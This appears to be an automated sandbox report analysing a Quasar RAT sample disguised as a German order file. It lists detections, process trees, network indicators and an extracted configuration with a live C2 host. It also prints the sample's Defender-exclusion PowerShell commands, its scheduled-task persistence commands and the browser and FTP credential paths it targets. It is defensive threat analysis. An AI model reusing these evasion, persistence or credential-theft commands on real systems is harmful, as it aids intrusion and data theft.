
Windows Analysis Report
Bestellung - 021224 - 901003637.exe

Overview

General Information

Sample name: Bestellung - 021224 - 901003637.exe
Analysis ID: 1567415
MD5: 15f259b30ec72a5217144834f7f5b564
SHA1: baed3fe7d059a497f856e263431ccd3872ef1ea1
SHA256: 01de053d9560d419f0b6c35dbddb1175eb1fd7a21450989332024b812d39c4c2
Tags: DEU, exe, geo, user-abuse_ch

Detection

Quasar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Quasar RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Bestellung - 021224 - 901003637.exe (PID: 6052 cmdline: "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe" MD5: 15F259B30EC72A5217144834F7F5B564)
    • powershell.exe (PID: 5364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1824 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7128 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Bestellung - 021224 - 901003637.exe (PID: 2288 cmdline: "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe" MD5: 15F259B30EC72A5217144834F7F5B564)
      • schtasks.exe (PID: 4032 cmdline: "schtasks" /create /tn "Outlooks" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" /rl HIGHEST /f MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • outlooks.exe (PID: 3648 cmdline: "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" MD5: 15F259B30EC72A5217144834F7F5B564)
        • powershell.exe (PID: 3116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 5288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1568 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 3352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 1296 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpD780.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • outlooks.exe (PID: 6088 cmdline: "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" MD5: 15F259B30EC72A5217144834F7F5B564)
          • schtasks.exe (PID: 2056 cmdline: "schtasks" /create /tn "Outlooks" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" /rl HIGHEST /f MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 3848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • eNuXmIwkixzW.exe (PID: 3020 cmdline: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe MD5: 15F259B30EC72A5217144834F7F5B564)
    • schtasks.exe (PID: 3392 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmp314.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • eNuXmIwkixzW.exe (PID: 4820 cmdline: "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe" MD5: 15F259B30EC72A5217144834F7F5B564)
  • outlooks.exe (PID: 4936 cmdline: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe MD5: 15F259B30EC72A5217144834F7F5B564)
    • powershell.exe (PID: 792 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4628 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 3456 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmp537.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • outlooks.exe (PID: 6064 cmdline: "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" MD5: 15F259B30EC72A5217144834F7F5B564)
  • cleanup
Name: Quasar RAT, QuasarRAT
Description: Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
Attribution:
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat
Extracted malware configuration (Quasar):
{"Version": "1.4.1", "Host:Port": "hoffmann3.ydns.eu:5829;", "SubDirectory": "WindowsUpdates", "InstallName": "outlooks.exe", "MutexName": "532aca2b-96ff-44aa-9213-031e975919ac", "StartupKey": "Outlooks", "Tag": "DAVID", "LogDirectoryName": "Logs", "ServerSignature": "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", "ServerCertificate": "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"}
Source | Rule | Description | Author | Strings
0000000A.00000002.1683887266.00000000026A6000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security |
00000009.00000002.1477097522.0000000000720000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security |
0000000D.00000002.1555939194.00000000033C3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security |
00000000.00000002.1448519828.00000000029F1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security |
0000000F.00000002.1685100686.00000000033FE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security |
(5 of 14 entries shown)
Source | Rule | Description | Author | Strings
9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security |
9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack | MAL_QuasarRAT_May19_1 | Detects QuasarRAT malware | Florian Roth |
  • 0x28ef4d:$x1: Quasar.Common.Messages
  • 0x29f276:$x1: Quasar.Common.Messages
  • 0x2ab832:$x4: Uninstalling... good bye :-(
  • 0x2ad027:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_GENInfoStealer | Detects executables containing common artifacts observed in infostealers | ditekSHen |
  • 0x2aade4:$f1: FileZilla\recentservers.xml
  • 0x2aae24:$f2: FileZilla\sitemanager.xml
  • 0x2aae66:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
  • 0x2ab0b2:$b1: Chrome\User Data\
  • 0x2ab108:$b1: Chrome\User Data\
  • 0x2ab3e0:$b2: Mozilla\Firefox\Profiles
  • 0x2ab4dc:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  • 0x2fd438:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  • 0x2ab634:$b4: Opera Software\Opera Stable\Login Data
  • 0x2ab6ee:$b5: YandexBrowser\User Data\
  • 0x2ab75c:$b5: YandexBrowser\User Data\
  • 0x2ab430:$s4: logins.json
  • 0x2ab166:$a1: username_value
  • 0x2ab184:$a2: password_value
  • 0x2ab470:$a3: encryptedUsername
  • 0x2fd37c:$a3: encryptedUsername
  • 0x2ab494:$a4: encryptedPassword
  • 0x2fd39a:$a4: encryptedPassword
  • 0x2fd318:$a5: httpRealm
9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack | MALWARE_Win_QuasarStealer | Detects Quasar infostealer | ditekshen |
  • 0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null
  • 0x2ab91c:$s3: Process already elevated.
  • 0x28ec4c:$s4: get_PotentiallyVulnerablePasswords
  • 0x278d08:$s5: GetKeyloggerLogsDirectory
  • 0x29e9d5:$s5: GetKeyloggerLogsDirectory
  • 0x28ec6f:$s6: set_PotentiallyVulnerablePasswords
  • 0x2fea66:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
(5 of 18 entries shown)

                System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", ParentImage: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe, ParentProcessId: 6052, ParentProcessName: Bestellung - 021224 - 901003637.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", ProcessId: 5364, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpD780.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpD780.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe", ParentImage: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe, ParentProcessId: 3648, ParentProcessName: outlooks.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpD780.tmp", ProcessId: 1296, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", ParentImage: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe, ParentProcessId: 6052, ParentProcessName: Bestellung - 021224 - 901003637.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp", ProcessId: 7128, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", ParentImage: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe, ParentProcessId: 6052, ParentProcessName: Bestellung - 021224 - 901003637.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", ProcessId: 5364, ProcessName: powershell.exe

                Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe", ParentImage: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe, ParentProcessId: 6052, ParentProcessName: Bestellung - 021224 - 901003637.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp", ProcessId: 7128, ProcessName: schtasks.exe

Suricata IDS alerts:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-03T14:53:52.621028+0100 | 2035595 | 1 | Domain Observed Used for C2 Detected | 193.34.212.17 | 5829 | 192.168.2.8 | 49713 | TCP
2024-12-03T14:53:52.621028+0100 | 2027619 | 1 | Domain Observed Used for C2 Detected | 193.34.212.17 | 5829 | 192.168.2.8 | 49713 | TCP


                AV Detection

Source: Bestellung - 021224 - 901003637.exe | Avira: detected
Source: hoffmann3.ydns.eu | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Avira: detection malicious, Label: HEUR/AGEN.1357257
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Avira: detection malicious, Label: HEUR/AGEN.1357257
Source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack | Malware Configuration Extractor: Quasar {"Version": "1.4.1", "Host:Port": "hoffmann3.ydns.eu:5829;", "SubDirectory": "WindowsUpdates", "InstallName": "outlooks.exe", "MutexName": "532aca2b-96ff-44aa-9213-031e975919ac", "StartupKey": "Outlooks", "Tag": "DAVID", "LogDirectoryName": "Logs", "ServerSignature": "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", "ServerCertificate": "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"}
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | ReversingLabs: Detection: 47%
Source: Bestellung - 021224 - 901003637.exe | ReversingLabs: Detection: 47%
Source: Yara match | File source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.outlooks.exe.4ba1d80.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.outlooks.exe.4ba1d80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.1683887266.00000000026A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1477097522.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1555939194.00000000033C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1448519828.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1685100686.00000000033FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.3874269347.0000000003642000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Bestellung - 021224 - 901003637.exe PID: 6052, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Bestellung - 021224 - 901003637.exe PID: 2288, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: eNuXmIwkixzW.exe PID: 3020, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outlooks.exe PID: 3648, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outlooks.exe PID: 4936, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: outlooks.exe PID: 6088, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 97.8% probability
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Joe Sandbox ML: detected
Source: Bestellung - 021224 - 901003637.exe | Joe Sandbox ML: detected
Source: Bestellung - 021224 - 901003637.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 103.126.138.87:443 -> 192.168.2.8:49716 version: TLS 1.2
Source: Bestellung - 021224 - 901003637.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Networking

Source: Network traffic | Suricata IDS: 2027619 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (Quasar CnC) : 193.34.212.17:5829 -> 192.168.2.8:49713
Source: Network traffic | Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 193.34.212.17:5829 -> 192.168.2.8:49713
Source: Malware configuration extractor | URLs: hoffmann3.ydns.eu
Source: Yara match | File source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.outlooks.exe.4ba1d80.0.raw.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.8:49713 -> 193.34.212.17:5829
Source: Joe Sandbox View | IP Address: 103.126.138.87
Source: Joe Sandbox View | ASN Name: PL-SKYTECH-ASPL
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ipwho.is
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 | Host: ipwho.is | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: hoffmann3.ydns.eu
Source: global traffic | DNS traffic detected: DNS query: ipwho.is
Source: Bestellung - 021224 - 901003637.exe, outlooks.exe.9.dr, eNuXmIwkixzW.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Bestellung - 021224 - 901003637.exe, outlooks.exe.9.dr, eNuXmIwkixzW.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: outlooks.exe, 00000016.00000002.3872064876.000000000179B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft.
Source: outlooks.exe, 00000016.00000002.3872064876.0000000001781000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: outlooks.exe, 00000016.00000002.3872064876.000000000179B000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.22.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: outlooks.exe, 00000016.00000002.3874269347.00000000035F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ipwho.is
Source: outlooks.exe, 00000016.00000002.3874269347.00000000035F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ipwho.isd
Source: outlooks.exe, 0000000F.00000002.1685100686.00000000033B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://localhost/arkanoid_server/requests.php
Source: Bestellung - 021224 - 901003637.exe, outlooks.exe.9.dr, eNuXmIwkixzW.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0
Source: outlooks.exe, 00000016.00000002.3874269347.0000000003642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: outlooks.exe, 00000016.00000002.3874269347.0000000003642000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/d
Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1448519828.0000000002A47000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000009.00000002.1499776253.0000000003191000.00000004.00000800.00020000.00000000.sdmp, eNuXmIwkixzW.exe, 0000000A.00000002.1683887266.00000000026A6000.00000004.00000800.00020000.00000000.sdmp, outlooks.exe, 0000000D.00000002.1555939194.00000000033C3000.00000004.00000800.00020000.00000000.sdmp, outlooks.exe, 0000000F.00000002.1685100686.00000000033FA000.00000004.00000800.00020000.00000000.sdmp, outlooks.exe, 00000016.00000002.3874269347.00000000033DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, outlooks.exe, 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: outlooks.exe, 00000016.00000002.3874269347.00000000035E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ipwho.is
Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, outlooks.exe, 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp, outlooks.exe, 00000016.00000002.3874269347.00000000035E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ipwho.is/
Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, outlooks.exe, 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
